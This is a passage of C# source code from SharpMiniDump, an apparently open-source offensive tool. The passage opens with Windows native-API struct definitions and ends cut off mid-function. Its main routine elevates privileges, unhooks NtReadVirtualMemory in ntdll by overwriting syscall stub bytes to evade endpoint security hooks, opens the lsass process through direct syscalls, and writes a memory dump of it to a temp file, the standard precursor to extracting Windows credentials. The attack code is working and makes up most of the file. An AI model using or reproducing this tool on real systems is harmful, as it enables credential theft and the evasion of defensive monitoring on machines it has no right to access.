TokenSecurityAttributes,
TokenIsRestricted,
MaxTokenInfoClass
}
public enum TOKEN_ELEVATION_TYPE
{
TokenElevationTypeDefault = 1,
TokenElevationTypeFull,
TokenElevationTypeLimited
}
public enum PSS_CAPTURE_FLAGS {
PSS_CAPTURE_NONE,
PSS_CAPTURE_VA_CLONE,
PSS_CAPTURE_RESERVED_00000002,
PSS_CAPTURE_HANDLES,
PSS_CAPTURE_HANDLE_NAME_INFORMATION,
PSS_CAPTURE_HANDLE_BASIC_INFORMATION,
PSS_CAPTURE_HANDLE_TYPE_SPECIFIC_INFORMATION,
PSS_CAPTURE_HANDLE_TRACE,
PSS_CAPTURE_THREADS,
PSS_CAPTURE_THREAD_CONTEXT,
PSS_CAPTURE_THREAD_CONTEXT_EXTENDED,
PSS_CAPTURE_RESERVED_00000400,
PSS_CAPTURE_VA_SPACE,
PSS_CAPTURE_VA_SPACE_SECTION_INFORMATION,
PSS_CAPTURE_IPT_TRACE,
PSS_CREATE_BREAKAWAY_OPTIONAL,
PSS_CREATE_BREAKAWAY,
PSS_CREATE_FORCE_BREAKAWAY,
PSS_CREATE_USE_VM_ALLOCATIONS,
PSS_CREATE_MEASURE_PERFORMANCE,
PSS_CREATE_RELEASE_SECTION
}
public enum MINIDUMP_CALLBACK_TYPE : uint
{
ModuleCallback,
ThreadCallback,
ThreadExCallback,
IncludeThreadCallback,
IncludeModuleCallback,
MemoryCallback,
CancelCallback,
WriteKernelMinidumpCallback,
KernelMinidumpStatusCallback,
RemoveMemoryCallback,
IncludeVmRegionCallback,
IoStartCallback,
IoWriteAllCallback,
IoFinishCallback,
ReadMemoryFailureCallback,
SecondaryFlagsCallback,
IsProcessSnapshotCallback,
VmStartCallback,
VmQueryCallback,
VmPreReadCallback,
VmPostReadCallback
}
[StructLayout(LayoutKind.Sequential, Pack = 4)]
public unsafe struct MINIDUMP_THREAD_CALLBACK
{
public uint ThreadId;
public IntPtr ThreadHandle;
public fixed byte Context[1232];
public uint SizeOfContext;
public ulong StackBase;
public ulong StackEnd;
}
[StructLayout(LayoutKind.Sequential, Pack = 4)]
public struct MINIDUMP_THREAD_EX_CALLBACK
{
public MINIDUMP_THREAD_CALLBACK BasePart;
public ulong BackingStoreBase;
public ulong BackingStoreEnd;
}
enum VS_FIXEDFILEINFO_FileFlags : uint
{
VS_FF_DEBUG = 0x00000001,
VS_FF_INFOINFERRED = 0x00000010,
VS_FF_PATCHED = 0x00000004,
VS_FF_PRERELEASE = 0x00000002,
VS_FF_PRIVATEBUILD = 0x00000008,
VS_FF_SPECIALBUILD = 0x00000020
}
enum VS_FIXEDFILEINFO_FileOSFlags : uint
{
VOS_DOS = 0x00010000,
VOS_NT = 0x00040000,
VOS__WINDOWS16 = 0x00000001,
VOS__WINDOWS32 = 0x00000004,
VOS_OS216 = 0x00020000,
VOS_OS232 = 0x00030000,
VOS__PM16 = 0x00000002,
VOS__PM32 = 0x00000003,
VOS_UNKNOWN = 0x00000000
}
enum VS_FIXEDFILEINFO_FileTypeFlags : uint
{
VFT_APP = 0x00000001,
VFT_DLL = 0x00000002,
VFT_DRV = 0x00000003,
VFT_FONT = 0x00000004,
VFT_STATIC_LIB = 0x00000007,
VFT_UNKNOWN = 0x00000000,
VFT_VXD = 0x00000005
}
enum VS_FIXEFILEINFO_FileSubTypeFlags : uint
{
// If the FileType is VFT_DRV
VFT2_DRV_COMM = 0x0000000A,
VFT2_DRV_DISPLAY = 0x00000004,
VFT2_DRV_INSTALLABLE = 0x00000008,
VFT2_DRV_KEYBOARD = 0x00000002,
VFT2_DRV_LANGUAGE = 0x00000003,
VFT2_DRV_MOUSE = 0x00000005,
VFT2_DRV_NETWORK = 0x00000006,
VFT2_DRV_PRINTER = 0x00000001,
VFT2_DRV_SOUND = 0x00000009,
VFT2_DRV_SYSTEM = 0x00000007,
VFT2_DRV_VERSIONED_PRINTER = 0x0000000C,
// If the FileType is VFT_FONT
VFT2_FONT_RASTER = 0x00000001,
VFT2_FONT_TRUETYPE = 0x00000003,
VFT2_FONT_VECTOR = 0x00000002,
VFT2_UNKNOWN = 0x00000000
}
[StructLayout(LayoutKind.Sequential, Pack = 4)]
public struct VS_FIXEDFILEINFO
{
public uint dwSignature;
public uint dwStrucVersion;
public uint dwFileVersionMS;
public uint dwFileVersionLS;
public uint dwProductVersionMS;
public uint dwProductVersionLS;
public uint dwFileFlagsMask;
public uint dwFileFlags;
public uint dwFileOS;
public uint dwFileType;
public uint dwFileSubtype;
public uint dwFileDateMS;
public uint dwFileDateLS;
}
[StructLayout(LayoutKind.Sequential, Pack = 4)]
public struct MINIDUMP_MODULE_CALLBACK
{
public IntPtr FullPath; // This is a PCWSTR
public ulong BaseOfImage;
public uint SizeOfImage;
public uint CheckSum;
public uint TimeDateStamp;
public VS_FIXEDFILEINFO VersionInfo;
public IntPtr CvRecord;
public uint SizeOfCvRecord;
public IntPtr MiscRecord;
public uint SizeOfMiscRecord;
}
public struct MINIDUMP_INCLUDE_THREAD_CALLBACK
{
public uint ThreadId;
}
[StructLayout(LayoutKind.Sequential, Pack = 4)]
public struct MINIDUMP_INCLUDE_MODULE_CALLBACK
{
public ulong BaseOfImage;
}
[StructLayout(LayoutKind.Sequential, Pack = 4)]
public struct MINIDUMP_IO_CALLBACK
{
public IntPtr Handle;
public ulong Offset;
public IntPtr Buffer;
public uint BufferBytes;
}
[StructLayout(LayoutKind.Sequential, Pack = 4)]
public struct MINIDUMP_READ_MEMORY_FAILURE_CALLBACK
{
public ulong Offset;
public uint Bytes;
public int FailureStatus; // HRESULT
}
[Flags]
public enum MINIDUMP_SECONDARY_FLAGS : uint
{
MiniSecondaryWithoutPowerInfo = 0x00000001
}
[StructLayout(LayoutKind.Explicit)]
public struct MINIDUMP_CALLBACK_INPUT
{
const int CallbackTypeOffset = 4 + 8;
const int UnionOffset = CallbackTypeOffset + 4;
[FieldOffset(0)]
public uint ProcessId;
[FieldOffset(4)]
public IntPtr ProcessHandle;
[FieldOffset(CallbackTypeOffset)]
public MINIDUMP_CALLBACK_TYPE CallbackType;
[FieldOffset(UnionOffset)]
public int Status; // HRESULT
[FieldOffset(UnionOffset)]
public MINIDUMP_THREAD_CALLBACK Thread;
[FieldOffset(UnionOffset)]
public MINIDUMP_THREAD_EX_CALLBACK ThreadEx;
[FieldOffset(UnionOffset)]
public MINIDUMP_MODULE_CALLBACK Module;
[FieldOffset(UnionOffset)]
public MINIDUMP_INCLUDE_THREAD_CALLBACK IncludeThread;
[FieldOffset(UnionOffset)]
public MINIDUMP_INCLUDE_MODULE_CALLBACK IncludeModule;
[FieldOffset(UnionOffset)]
public MINIDUMP_IO_CALLBACK Io;
[FieldOffset(UnionOffset)]
public MINIDUMP_READ_MEMORY_FAILURE_CALLBACK ReadMemoryFailure;
[FieldOffset(UnionOffset)]
public MINIDUMP_SECONDARY_FLAGS SecondaryFlags;
}
public enum STATE : uint
{
MEM_COMMIT = 0x1000,
MEM_FREE = 0x10000,
MEM_RESERVE = 0x2000
}
public enum TYPE : uint
{
MEM_IMAGE = 0x1000000,
MEM_MAPPED = 0x40000,
MEM_PRIVATE = 0x20000
}
[Flags]
public enum PROTECT : uint
{
PAGE_EXECUTE = 0x10,
PAGE_EXECUTE_READ = 0x20,
PAGE_EXECUTE_READWRITE = 0x40,
PAGE_EXECUTE_WRITECOPY = 0x80,
PAGE_NOACCESS = 0x01,
PAGE_READONLY = 0x02,
PAGE_READWRITE = 0x04,
PAGE_WRITECOPY = 0x08,
PAGE_TARGETS_INVALID = 0x40000000,
PAGE_TARGETS_NO_UPDATE = 0x40000000,
PAGE_GUARD = 0x100,
PAGE_NOCACHE = 0x200,
PAGE_WRITECOMBINE = 0x400
}
[StructLayout(LayoutKind.Sequential, Pack = 4)]
public struct MINIDUMP_MEMORY_INFO
{
public ulong BaseAddress;
public ulong AllocationBase;
public uint AllocationProtect;
public uint __alignment1;
public ulong RegionSize;
public STATE State;
public PROTECT Protect;
public TYPE Type;
public uint __alignment2;
}
[StructLayout(LayoutKind.Sequential, Pack = 4)]
public struct MemoryCallbackOutput
{
public ulong MemoryBase;
public uint MemorySize;
}
[StructLayout(LayoutKind.Sequential, Pack = 4)]
public struct CancelCallbackOutput
{
[MarshalAs(UnmanagedType.Bool)]
public bool CheckCancel;
[MarshalAs(UnmanagedType.Bool)]
public bool Cancel;
}
[StructLayout(LayoutKind.Sequential, Pack = 4)]
public struct MemoryInfoCallbackOutput
{
public MINIDUMP_MEMORY_INFO VmRegion;
[MarshalAs(UnmanagedType.Bool)]
public bool Continue;
}
[Flags]
public enum THREAD_WRITE_FLAGS : uint
{
ThreadWriteThread = 0x0001,
ThreadWriteStack = 0x0002,
ThreadWriteContext = 0x0004,
ThreadWriteBackingStore = 0x0008,
ThreadWriteInstructionWindow = 0x0010,
ThreadWriteThreadData = 0x0020,
ThreadWriteThreadInfo = 0x0040
}
[Flags]
public enum MODULE_WRITE_FLAGS : uint
{
ModuleWriteModule = 0x0001,
ModuleWriteDataSeg = 0x0002,
ModuleWriteMiscRecord = 0x0004,
ModuleWriteCvRecord = 0x0008,
ModuleReferencedByMemory = 0x0010,
ModuleWriteTlsData = 0x0020,
ModuleWriteCodeSegs = 0x0040
}
[StructLayout(LayoutKind.Explicit, Pack = 4)]
public struct MINIDUMP_CALLBACK_OUTPUT
{
[FieldOffset(0)]
public MODULE_WRITE_FLAGS ModuleWriteFlags;
[FieldOffset(0)]
public THREAD_WRITE_FLAGS ThreadWriteFlags;
[FieldOffset(0)]
public uint SecondaryFlags;
[FieldOffset(0)]
public MemoryCallbackOutput Memory;
[FieldOffset(0)]
public CancelCallbackOutput Cancel;
[FieldOffset(0)]
public IntPtr Handle;
[FieldOffset(0)]
public MemoryInfoCallbackOutput MemoryInfo;
[FieldOffset(0)]
public int Status; // HRESULT
}
[UnmanagedFunctionPointer(CallingConvention.StdCall)]
[return: MarshalAs(UnmanagedType.Bool)]
public delegate bool MINIDUMP_CALLBACK_ROUTINE(
[In] IntPtr CallbackParam,
[In] ref MINIDUMP_CALLBACK_INPUT CallbackInput,
[In, Out] ref MINIDUMP_CALLBACK_OUTPUT CallbackOutput
);
public struct MINIDUMP_CALLBACK_INFORMATION
{
public MINIDUMP_CALLBACK_ROUTINE CallbackRoutine;
public IntPtr CallbackParam;
}
public enum CONTEXT_FLAGS : uint
{
CONTEXT_i386 = 0x10000,
CONTEXT_i486 = 0x10000, // same as i386
CONTEXT_CONTROL = CONTEXT_i386 | 0x01, // SS:SP, CS:IP, FLAGS, BP
CONTEXT_INTEGER = CONTEXT_i386 | 0x02, // AX, BX, CX, DX, SI, DI
CONTEXT_SEGMENTS = CONTEXT_i386 | 0x04, // DS, ES, FS, GS
CONTEXT_FLOATING_POINT = CONTEXT_i386 | 0x08, // 387 state
CONTEXT_DEBUG_REGISTERS = CONTEXT_i386 | 0x10, // DB 0-3,6,7
CONTEXT_EXTENDED_REGISTERS = CONTEXT_i386 | 0x20, // cpu specific extensions
CONTEXT_FULL = CONTEXT_CONTROL | CONTEXT_INTEGER | CONTEXT_SEGMENTS,
CONTEXT_ALL = CONTEXT_CONTROL | CONTEXT_INTEGER | CONTEXT_SEGMENTS | CONTEXT_FLOATING_POINT | CONTEXT_DEBUG_REGISTERS | CONTEXT_EXTENDED_REGISTERS
}
[StructLayout(LayoutKind.Sequential)]
public struct M128A
{
public ulong High;
public long Low;
public override string ToString()
{
return string.Format("High:{0}, Low:{1}", this.High, this.Low);
}
}
///
/// x64
///
[StructLayout(LayoutKind.Sequential, Pack = 16)]
public struct XSAVE_FORMAT64
{
public ushort ControlWord;
public ushort StatusWord;
public byte TagWord;
public byte Reserved1;
public ushort ErrorOpcode;
public uint ErrorOffset;
public ushort ErrorSelector;
public ushort Reserved2;
public uint DataOffset;
public ushort DataSelector;
public ushort Reserved3;
public uint MxCsr;
public uint MxCsr_Mask;
[MarshalAs(UnmanagedType.ByValArray, SizeConst = 8)]
public M128A[] FloatRegisters;
[MarshalAs(UnmanagedType.ByValArray, SizeConst = 16)]
public M128A[] XmmRegisters;
[MarshalAs(UnmanagedType.ByValArray, SizeConst = 96)]
public byte[] Reserved4;
}
///
/// x64
///
[StructLayout(LayoutKind.Sequential, Pack = 16)]
public struct CONTEXT
{
public ulong P1Home;
public ulong P2Home;
public ulong P3Home;
public ulong P4Home;
public ulong P5Home;
public ulong P6Home;
public CONTEXT_FLAGS ContextFlags;
public uint MxCsr;
public ushort SegCs;
public ushort SegDs;
public ushort SegEs;
public ushort SegFs;
public ushort SegGs;
public ushort SegSs;
public uint EFlags;
public ulong Dr0;
public ulong Dr1;
public ulong Dr2;
public ulong Dr3;
public ulong Dr6;
public ulong Dr7;
public ulong Rax;
public ulong Rcx;
public ulong Rdx;
public ulong Rbx;
public ulong Rsp;
public ulong Rbp;
public ulong Rsi;
public ulong Rdi;
public ulong R8;
public ulong R9;
public ulong R10;
public ulong R11;
public ulong R12;
public ulong R13;
public ulong R14;
public ulong R15;
public ulong Rip;
public XSAVE_FORMAT64 DUMMYUNIONNAME;
[MarshalAs(UnmanagedType.ByValArray, SizeConst = 26)]
public M128A[] VectorRegister;
public ulong VectorControl;
public ulong DebugControl;
public ulong LastBranchToRip;
public ulong LastBranchFromRip;
public ulong LastExceptionToRip;
public ulong LastExceptionFromRip;
}
public static IntPtr OpenProcess(ProcessAccessFlags processAccess, bool bInheritHandle, int processId)
{
Natives.CLIENT_ID clientid = new Natives.CLIENT_ID();
clientid.UniqueProcess = (IntPtr)processId;
clientid.UniqueThread = IntPtr.Zero;
IntPtr hProcess = IntPtr.Zero;
Natives.OBJECT_ATTRIBUTES objAttribute = new Natives.OBJECT_ATTRIBUTES();
NTSTATUS res = NativeSysCall.ZwOpenProcess10(ref hProcess, processAccess, objAttribute, ref clientid);
return hProcess;
}
private static IntPtr GetNtDll()
{
return LoadLibrary("ntdll.dll");
}
public static int NtFilterToken(IntPtr TokenHandle, uint Flags, IntPtr SidsToDisable, IntPtr PrivilegesToDelete, IntPtr RestrictedSids, ref IntPtr hToken)
{
IntPtr proc = GetProcAddress(GetNtDll(), "NtFilterToken");
NativeSysCall.Delegates.NtFilterToken NtSetInformationToken = (NativeSysCall.Delegates.NtFilterToken)Marshal.GetDelegateForFunctionPointer(proc, typeof(NativeSysCall.Delegates.NtFilterToken));
return NtFilterToken(TokenHandle, Flags, SidsToDisable, PrivilegesToDelete, RestrictedSids, ref hToken);
}
private static IntPtr GetKernel32()
{
return LoadLibrary("Kernel32.dll");
}
private static IntPtr GetKernelbase()
{
return LoadLibrary("Kernelbase.dll");
}
private static IntPtr GetAdvapi32()
{
return LoadLibrary("Advapi32.dll");
}
private static IntPtr GetDbgcore()
{
return LoadLibrary("dbgcore.dll");
}
public static IntPtr GetCurrentProcess()
{
IntPtr proc = GetProcAddress(GetKernel32(), "GetCurrentProcess");
NativeSysCall.Delegates.GetCurrentProcess GetCurrentProcess = (NativeSysCall.Delegates.GetCurrentProcess)Marshal.GetDelegateForFunctionPointer(proc, typeof(NativeSysCall.Delegates.GetCurrentProcess));
return GetCurrentProcess();
}
public static bool CloseHandle(IntPtr handle)
{
IntPtr proc = GetProcAddress(GetKernel32(), "CloseHandle");
NativeSysCall.Delegates.CloseHandle CloseHandle = (NativeSysCall.Delegates.CloseHandle)Marshal.GetDelegateForFunctionPointer(proc, typeof(NativeSysCall.Delegates.CloseHandle));
return CloseHandle(handle);
}
public static bool UpdateProcThreadAttribute(IntPtr lpAttributeList, uint dwFlags, IntPtr Attribute, IntPtr lpValue, IntPtr cbSize, IntPtr lpPreviousValue, IntPtr lpReturnSize)
{
IntPtr proc = GetProcAddress(GetKernelbase(), "UpdateProcThreadAttribute");
NativeSysCall.Delegates.UpdateProcThreadAttribute UpdateProcThreadAttribute = (NativeSysCall.Delegates.UpdateProcThreadAttribute)Marshal.GetDelegateForFunctionPointer(proc, typeof(NativeSysCall.Delegates.UpdateProcThreadAttribute));
return UpdateProcThreadAttribute(lpAttributeList, dwFlags, Attribute, lpValue, cbSize, lpPreviousValue, lpReturnSize);
}
public static bool InitializeProcThreadAttributeList(IntPtr lpAttributeList, int dwAttributeCount, int dwFlags, ref IntPtr lpSize)
{
IntPtr proc = GetProcAddress(GetKernelbase(), "InitializeProcThreadAttributeList");
NativeSysCall.Delegates.InitializeProcThreadAttributeList InitializeProcThreadAttributeList = (NativeSysCall.Delegates.InitializeProcThreadAttributeList)Marshal.GetDelegateForFunctionPointer(proc, typeof(NativeSysCall.Delegates.InitializeProcThreadAttributeList));
return InitializeProcThreadAttributeList(lpAttributeList, dwAttributeCount, dwFlags, ref lpSize);
}
public static bool RtlGetVersion(ref OSVERSIONINFOEXW lpVersionInformation)
{
IntPtr proc = GetProcAddress(GetNtDll(), "RtlGetVersion");
NativeSysCall.Delegates.RtlGetVersion RtlGetVersion = (NativeSysCall.Delegates.RtlGetVersion)Marshal.GetDelegateForFunctionPointer(proc, typeof(NativeSysCall.Delegates.RtlGetVersion));
return RtlGetVersion(ref lpVersionInformation);
}
public static bool VirtualProtect(IntPtr lpAddress, UIntPtr dwSize, uint flNewProtect, out uint lpflOldProtect)
{
IntPtr proc = GetProcAddress(GetKernelbase(), "VirtualProtect");
NativeSysCall.Delegates.VirtualProtect VirtualProtect = (NativeSysCall.Delegates.VirtualProtect)Marshal.GetDelegateForFunctionPointer(proc, typeof(NativeSysCall.Delegates.VirtualProtect));
return VirtualProtect(lpAddress, dwSize, flNewProtect, out lpflOldProtect);
}
public static bool VirtualProtectEx(IntPtr hProcess, IntPtr lpAddress, IntPtr dwSize, uint newprotect, out uint oldprotect)
{
IntPtr proc = GetProcAddress(GetKernelbase(), "VirtualProtectEx");
NativeSysCall.Delegates.VirtualProtectEx VirtualProtectEx = (NativeSysCall.Delegates.VirtualProtectEx)Marshal.GetDelegateForFunctionPointer(proc, typeof(NativeSysCall.Delegates.VirtualProtectEx));
return VirtualProtectEx(hProcess, lpAddress, dwSize, newprotect, out oldprotect);
}
public static UInt32 LdrLoadDll(IntPtr PathToFile, UInt32 dwFlags, ref Natives.UNICODE_STRING ModuleFileName, ref IntPtr ModuleHandle)
{
IntPtr proc = GetProcAddress(GetNtDll(), "LdrLoadDll");
NativeSysCall.Delegates.LdrLoadDll LdrLoadDll = (NativeSysCall.Delegates.LdrLoadDll)Marshal.GetDelegateForFunctionPointer(proc, typeof(NativeSysCall.Delegates.LdrLoadDll));
return (uint)LdrLoadDll(PathToFile, dwFlags, ref ModuleFileName, ref ModuleHandle);
}
public static void RtlInitUnicodeString(ref Natives.UNICODE_STRING DestinationString, [MarshalAs(UnmanagedType.LPWStr)] string SourceString)
{
IntPtr proc = GetProcAddress(GetNtDll(), "RtlInitUnicodeString");
NativeSysCall.Delegates.RtlInitUnicodeString RtlInitUnicodeString = (NativeSysCall.Delegates.RtlInitUnicodeString)Marshal.GetDelegateForFunctionPointer(proc, typeof(NativeSysCall.Delegates.RtlInitUnicodeString));
RtlInitUnicodeString(ref DestinationString, SourceString);
}
public static bool GetTokenInformation(IntPtr TokenHandle, TOKEN_INFORMATION_CLASS TokenInformationClass, IntPtr TokenInformation, UInt32 TokenInformationLength, out UInt32 ReturnLength)
{
IntPtr proc = GetProcAddress(GetKernelbase(), "GetTokenInformation");
NativeSysCall.Delegates.GetTokenInformation GetTokenInformation = (NativeSysCall.Delegates.GetTokenInformation)Marshal.GetDelegateForFunctionPointer(proc, typeof(NativeSysCall.Delegates.GetTokenInformation));
return GetTokenInformation( TokenHandle, TokenInformationClass, TokenInformation, TokenInformationLength, out ReturnLength);
}
public static bool OpenProcessToken(IntPtr hProcess, UInt32 dwDesiredAccess, out IntPtr hToken)
{
IntPtr proc = GetProcAddress(GetKernelbase(), "OpenProcessToken");
NativeSysCall.Delegates.OpenProcessToken OpenProcessToken = (NativeSysCall.Delegates.OpenProcessToken)Marshal.GetDelegateForFunctionPointer(proc, typeof(NativeSysCall.Delegates.OpenProcessToken));
return OpenProcessToken( hProcess, dwDesiredAccess, out hToken);
}
public static bool MiniDumpWriteDump(IntPtr hProcess, uint ProcessId, Microsoft.Win32.SafeHandles.SafeFileHandle hFile, int DumpType, IntPtr ExceptionParam, IntPtr UserStreamParam, IntPtr CallbackParam)
{
IntPtr proc = GetProcAddress(GetDbgcore(), "MiniDumpWriteDump");
NativeSysCall.Delegates.MiniDumpWriteDump MiniDumpWriteDump = (NativeSysCall.Delegates.MiniDumpWriteDump)Marshal.GetDelegateForFunctionPointer(proc, typeof(NativeSysCall.Delegates.MiniDumpWriteDump));
return MiniDumpWriteDump( hProcess, ProcessId, hFile, DumpType, ExceptionParam, UserStreamParam, CallbackParam);
}
public static bool LookupPrivilegeValue(String lpSystemName, String lpName, ref LUID luid)
{
IntPtr proc = GetProcAddress(GetAdvapi32(), "LookupPrivilegeValueA");
NativeSysCall.Delegates.LookupPrivilegeValue LookupPrivilegeValue = (NativeSysCall.Delegates.LookupPrivilegeValue)Marshal.GetDelegateForFunctionPointer(proc, typeof(NativeSysCall.Delegates.LookupPrivilegeValue));
return LookupPrivilegeValue( lpSystemName, lpName, ref luid);
}
public static bool AdjustTokenPrivileges(IntPtr TokenHandle, bool DisableAllPrivileges, ref TOKEN_PRIVILEGES NewState, UInt32 BufferLengthInBytes, ref TOKEN_PRIVILEGES PreviousState, out UInt32 ReturnLengthInBytes)
{
IntPtr proc = GetProcAddress(GetAdvapi32(), "AdjustTokenPrivileges");
NativeSysCall.Delegates.AdjustTokenPrivileges AdjustTokenPrivileges = (NativeSysCall.Delegates.AdjustTokenPrivileges)Marshal.GetDelegateForFunctionPointer(proc, typeof(NativeSysCall.Delegates.AdjustTokenPrivileges));
return AdjustTokenPrivileges( TokenHandle, DisableAllPrivileges, ref NewState, BufferLengthInBytes, ref PreviousState, out ReturnLengthInBytes);
}
public static int PssCaptureSnapshot(IntPtr ProcessHandle, PSS_CAPTURE_FLAGS CaptureFlags, int ThreadContextFlags, ref IntPtr SnapshotHandle)
{
IntPtr proc = GetProcAddress(GetKernel32(), "PssCaptureSnapshot");
NativeSysCall.Delegates.PssCaptureSnapshot PssCaptureSnapshot = (NativeSysCall.Delegates.PssCaptureSnapshot)Marshal.GetDelegateForFunctionPointer(proc, typeof(NativeSysCall.Delegates.PssCaptureSnapshot));
return PssCaptureSnapshot( ProcessHandle, CaptureFlags, ThreadContextFlags, ref SnapshotHandle);
}
public static IntPtr GetProcAddress(IntPtr hModule, string procName)
{
return CustomLoadLibrary.GetExportAddress(hModule, procName);
}
public static IntPtr LoadLibrary(string name)
{
return CustomLoadLibrary.GetDllAddress(name, true);
}
}
}
================================================
FILE: SharpMiniDump/Program.cs
================================================
//
// Author: B4rtik (@b4rtik)
// Project: SharpMiniDump (https://github.com/b4rtik/SharpMiniDump)
// License: BSD 3-Clause
//
using System;
using System.ComponentModel;
using System.Diagnostics;
using System.IO;
using System.Runtime.InteropServices;
using System.Threading;
namespace SharpMiniDump
{
public class Program
{
static void Main(string[] args)
{
Execute(args);
}
public static void Execute(string[] args)
{
if (IntPtr.Size != 8)
{
return;
}
if (!IsElevated())
{
Console.WriteLine("Run in High integrity context");
return;
}
SetDebugPrivilege();
Natives.WIN_VER_INFO pWinVerInfo = new Natives.WIN_VER_INFO();
Natives.OSVERSIONINFOEXW osInfo = new Natives.OSVERSIONINFOEXW();
osInfo.dwOSVersionInfoSize = Marshal.SizeOf(osInfo);
Natives.RtlGetVersion(ref osInfo);
pWinVerInfo.chOSMajorMinor = osInfo.dwMajorVersion + "." + osInfo.dwMinorVersion;
Console.WriteLine("[*] OS MajorMinor version : " + pWinVerInfo.chOSMajorMinor);
if(!pWinVerInfo.chOSMajorMinor.Equals("10.0"))
{
Console.WriteLine("[x] Windows 10 - Windows Server 2016 only");
return;
}
pWinVerInfo.SystemCall = 0x3F;
Natives.RtlInitUnicodeString(ref pWinVerInfo.ProcName, @"lsass.exe");
pWinVerInfo.hTargetPID = (IntPtr)Process.GetProcessesByName("lsass")[0].Id;
pWinVerInfo.lpApiCall = "NtReadVirtualMemory";
if (!UnHookNativeApi(pWinVerInfo))
{
Console.WriteLine("[x] error unhooking {0}", pWinVerInfo.lpApiCall);
return;
}
Natives.CLIENT_ID clientid = new Natives.CLIENT_ID();
clientid.UniqueProcess = pWinVerInfo.hTargetPID;
clientid.UniqueThread = IntPtr.Zero;
IntPtr hProcess = IntPtr.Zero;
Natives.OBJECT_ATTRIBUTES objAttribute = new Natives.OBJECT_ATTRIBUTES();
var status = NativeSysCall.ZwOpenProcess10(ref hProcess, Natives.ProcessAccessFlags.All, objAttribute, ref clientid);
if (hProcess == IntPtr.Zero)
{
Console.WriteLine("[x] Error ZwOpenProcess10 " + status);
return;
}
Console.WriteLine("[*] ZwOpenProcess10 " + status);
Natives.PSS_CAPTURE_FLAGS flags = Natives.PSS_CAPTURE_FLAGS.PSS_CAPTURE_VA_CLONE
| Natives.PSS_CAPTURE_FLAGS.PSS_CAPTURE_HANDLES
| Natives.PSS_CAPTURE_FLAGS.PSS_CAPTURE_HANDLE_NAME_INFORMATION
| Natives.PSS_CAPTURE_FLAGS.PSS_CAPTURE_HANDLE_BASIC_INFORMATION
| Natives.PSS_CAPTURE_FLAGS.PSS_CAPTURE_HANDLE_TYPE_SPECIFIC_INFORMATION
| Natives.PSS_CAPTURE_FLAGS.PSS_CAPTURE_HANDLE_TRACE
| Natives.PSS_CAPTURE_FLAGS.PSS_CAPTURE_THREADS
| Natives.PSS_CAPTURE_FLAGS.PSS_CAPTURE_THREAD_CONTEXT
| Natives.PSS_CAPTURE_FLAGS.PSS_CAPTURE_THREAD_CONTEXT_EXTENDED
| Natives.PSS_CAPTURE_FLAGS.PSS_CREATE_BREAKAWAY
| Natives.PSS_CAPTURE_FLAGS.PSS_CREATE_BREAKAWAY_OPTIONAL
| Natives.PSS_CAPTURE_FLAGS.PSS_CREATE_USE_VM_ALLOCATIONS
| Natives.PSS_CAPTURE_FLAGS.PSS_CREATE_RELEASE_SECTION;
IntPtr SnapshotHandle = IntPtr.Zero;
int pss = Natives.PssCaptureSnapshot(hProcess,flags, 1048607,ref SnapshotHandle);
Console.WriteLine("[*] PssCaptureSnapshot " + pss);
if (SnapshotHandle == IntPtr.Zero)
{
Console.WriteLine("[x] Error PssCaptureSnapshot ");
return;
}
Natives.UNICODE_STRING uFileName = new Natives.UNICODE_STRING();
Natives.RtlInitUnicodeString(ref uFileName, @"\??\C:\Windows\Temp\dumpert.dmp");
Microsoft.Win32.SafeHandles.SafeFileHandle hDmpFile;
IntPtr hElm = IntPtr.Zero;
Natives.IO_STATUS_BLOCK IoStatusBlock = new Natives.IO_STATUS_BLOCK();
IntPtr objectName = Marshal.AllocHGlobal(Marshal.SizeOf(uFileName));
Marshal.StructureToPtr(uFileName, objectName, true);
Natives.OBJECT_ATTRIBUTES FileObjectAttributes = new Natives.OBJECT_ATTRIBUTES
{
ObjectName = objectName,
Attributes = 0x00000040,
Length = (ulong)Marshal.SizeOf(typeof(Natives.OBJECT_ATTRIBUTES)),
RootDirectory = IntPtr.Zero,
SecurityDescriptor = IntPtr.Zero,
SecurityQualityOfService = IntPtr.Zero
};
Natives.LARGE_INTEGER lint = new Natives.LARGE_INTEGER();
lint.HighPart = 0;
lint.LowPart = 0;
long allocationsize = 0;
status = NativeSysCall.NtCreateFile10(
out hDmpFile,
(int)Natives.FILE_GENERIC_WRITE,
ref FileObjectAttributes,
out IoStatusBlock,
ref allocationsize,
Natives.FILE_ATTRIBUTE_NORMAL,
System.IO.FileShare.Write,
Natives.FILE_OVERWRITE_IF,
Natives.FILE_SYNCHRONOUS_IO_NONALERT,
hElm, 0);
if (hDmpFile.IsInvalid)
{
Console.WriteLine("[x] Error NtCreateFile10 " + status + " " + IoStatusBlock.status);
NativeSysCall.ZwClose10(hProcess);
return;
}
Natives.MINIDUMP_CALLBACK_INFORMATION CallbackInfo = new Natives.MINIDUMP_CALLBACK_INFORMATION();
CallbackInfo.CallbackRoutine = Program.MyMiniDumpWriteDumpCallback;
CallbackInfo.CallbackParam = IntPtr.Zero;
IntPtr pCallbackInfo = Marshal.AllocHGlobal(Marshal.SizeOf(CallbackInfo));
Marshal.StructureToPtr(CallbackInfo, pCallbackInfo, false);
IntPtr ExceptionParam = IntPtr.Zero;
IntPtr UserStreamParam = IntPtr.Zero;
IntPtr CallbackParam = IntPtr.Zero;
Console.WriteLine("[*] Target PID " + pWinVerInfo.hTargetPID);
Console.WriteLine("[*] Generating minidump.... " + pWinVerInfo.hTargetPID);
if (!Natives.MiniDumpWriteDump(SnapshotHandle, (uint)pWinVerInfo.hTargetPID, hDmpFile, 2, ExceptionParam, UserStreamParam, pCallbackInfo))
{
Console.WriteLine("[x] Error MiniDumpWriteDump ");
NativeSysCall.ZwClose10(hProcess);
return;
}
hDmpFile.Dispose();
NativeSysCall.ZwClose10(hProcess);
Console.WriteLine("[*] End ");
Console.WriteLine("[*] Minidump generated in " + Marshal.PtrToStringUni(uFileName.Buffer).Substring(4));
}
private static bool UnHookNativeApi(Natives.WIN_VER_INFO pWinVerInfo)
{
byte[] AssemblyBytes = { 0x4C, 0x8B, 0xD1, 0xB8, 0xFF };
AssemblyBytes[4] = (byte)pWinVerInfo.SystemCall;
IntPtr ntdll = Natives.LoadLibrary("ntdll.dll");
IntPtr proc = Natives.GetProcAddress(ntdll, pWinVerInfo.lpApiCall);
IntPtr lpBaseAddress = proc;
uint OldProtection = 0;
uint NewProtection = 0;
uint uSize = 10;
var status = NativeSysCall.ZwProtectVirtualMemory10(Process.GetCurrentProcess().Handle, ref lpBaseAddress, ref uSize, 0x40, ref OldProtection);
if (status != Natives.NTSTATUS.Success)
{
Console.WriteLine("[x] Error ZwProtectVirtualMemory10 1 " + status);
